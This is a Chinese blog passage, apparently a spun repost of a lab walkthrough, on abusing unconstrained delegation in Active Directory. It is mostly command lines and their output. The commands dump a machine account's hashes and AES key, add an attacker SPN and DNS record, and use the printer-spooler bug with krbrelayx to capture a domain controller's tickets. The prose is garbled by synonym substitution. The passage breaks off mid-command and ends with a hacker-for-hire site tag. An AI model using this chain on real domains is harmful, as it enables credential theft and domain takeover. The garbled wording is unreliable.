上一篇文章，我只讲了中继进犯的基本理论，这篇文章，我会举两个示例来及详细阐明。 示例1：运用计算机帐户和SpoolService缝隙获取DC同步权限 在之一种情况下，咱们将乱用我的internal.corp实验室域中的计算机帐户的无约束派遣权限。经过进犯用户testuser获得了此主机的管理权限，该用户是该主机上Administrators组的成员。咱们将依照上面列出的过程，首要获取Kerberos密钥和NTLM哈希： user@localhost:~$ secretsdump.py testuser@icorp-w10.internal.corp Impacket v0.9.19-dev - Copyright 2019 SecureAuth Corporation Password: [*] Service RemoteRegistry is in stopped state [*] Service RemoteRegistry is disabled, enabling it [*] Starting service RemoteRegistry [*] Target system bootKey: 0x38f3153a77837cf2c5d04b049727a771 ...cut... [*] Dumping LSA Secrets [*] $MACHINE.ACC ICORPICORP-W10$:aes256-cts-hmac-sha1-96:9ff86898afa70f5f7b9f2bf16320cb38edb2639409e1bc441ac417fac1fed5ab ICORPICORP-W10$:aes128-cts-hmac-sha1-96:a6e34ed07f7bffba151fedee4d6640fd ICORPICORP-W10$:des-cbc-md5:91abd073c7a8e534 ICORPICORP-W10$:aad3b435b51404eeaad3b435b51404ee:c1c635aa12ae60b7fe39e28456a7bac6::: 现在咱们增加SPN，运用方才转储的NTLM哈希作为设备帐户进行身份验证，该帐户能够修正它自己的SPN，但只能经过前面讨论过的msDS-AdditionalDnsHostName特点进行修正。咱们将运用addsp .py实用程序将SPN HOST/attack .internal.corp增加到计算机帐户(用于 *** B)。 user@localhost:~/krbrelayx$ python addspn.py -u icorpicorp-w10$ -p aad3b435b51404eeaad3b435b51404ee:c1c635aa12ae60b7fe39e28456a7bac6 -s HOST/attacker.internal.corp -q icorp-dc.internal.corp [-] Connecting to host... [-] Binding to host [+] Bind OK [+] Found modification target DN: CN=ICORP-W10,CN=Computers,DC=internal,DC=corp - STATUS: Read - READ TIME: 2019-01-09T21:55:23.923810 dNSHostName: ICORP-W10.internal.corp sAMAccountName: ICORP-W10$ servicePrincipalName: RestrictedKrbHost/ICORP-W10 HOST/ICORP-W10 RestrictedKrbHost/ICORP-W10.internal.corp HOST/ICORP-W10.internal.corp user@localhost:~/krbrelayx$ python addspn.py -u icorpicorp-w10$ -p aad3b435b51404eeaad3b435b51404ee:c1c635aa12ae60b7fe39e28456a7bac6 -s HOST/attacker.internal.corp icorp-dc.internal.corp [-] Connecting to host... [-] Binding to host [+] Bind OK [+] Found modification target [!] Could not modify object, the server reports a constrained violation [!] You either supplied a malformed SPN, or you do not have access rights to add this SPN (Validated write only allows adding SPNs matching the hostname) [!] To add any SPN in the current domain, use --additional to add the SPN via the msDS-AdditionalDnsHostName attribute user@localhost:~/krbrelayx$ python addspn.py -u icorpicorp-w10$ -p aad3b435b51404eeaad3b435b51404ee:c1c635aa12ae60b7fe39e28456a7bac6 -s HOST/attacker.internal.corp icorp-dc.internal.corp --additional [-] Connecting to host... [-] Binding to host [+] Bind OK [+] Found modification target [+] SPN Modified successfully 针对attacker.internal.corp的SPN现在存在于受害者帐户中，但它的DNS条目尚不存在。咱们运用dnstool.py实用程序增加记载，指向进犯者IP： user@localhost:~/krbrelayx$ python dnstool.py -u icorpicorp-w10$ -p aad3b435b51404eeaad3b435b51404ee:c1c635aa12ae60b7fe39e28456a7bac6 -r attacker.internal.corp -d 192.168.111.87 --action add icorp-dc.internal.corp [-] Connecting to host... [-] Binding to host [+] Bind OK [-] Adding new record [+] LDAP operation completed successfully user@localhost:~/krbrelayx$ nslookup attacker.internal.corp 192.168.111.2 Server:192.168.111.2 Address:192.168.111.2#53 Name:attacker.internal.corp Address: 192.168.111.87 现在，咱们经过打印机缝隙让域控制器对咱们进行身份验证，一起在导出形式发动krbrelayx，其间一切提取的TGT都将保存到磁盘。咱们为krbrelayx供给了AES256密钥，由于默许情况下该密钥将用于计算机帐户。 user@localhost:~/krbrelayx$ python printerbug.py -hashes aad3b435b51404eeaad3b435b51404ee:c1c635aa12ae60b7fe39e28456a7bac6 internal.corp/icorp-w10$@icorp-dc.internal.corp attacker.internal.corp [*] Impacket v0.9.19-dev - Copyright 2019 SecureAuth Corporation [*] Attempting to trigger authentication via rprn RPC at icorp-dc.internal.corp [*] Bind OK [*] Got handle DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Triggered RPC backconnect, this may or may not have worked 不同的屏幕上的krbrelayx： user@localhost:~/krbrelayx$ sudo python krbrelayx.py -aesKey 9ff86898afa70f5f7b9f2bf16320cb38edb2639409e1bc441ac417fac1fed5ab[1][2][3][4][5]黑客接单网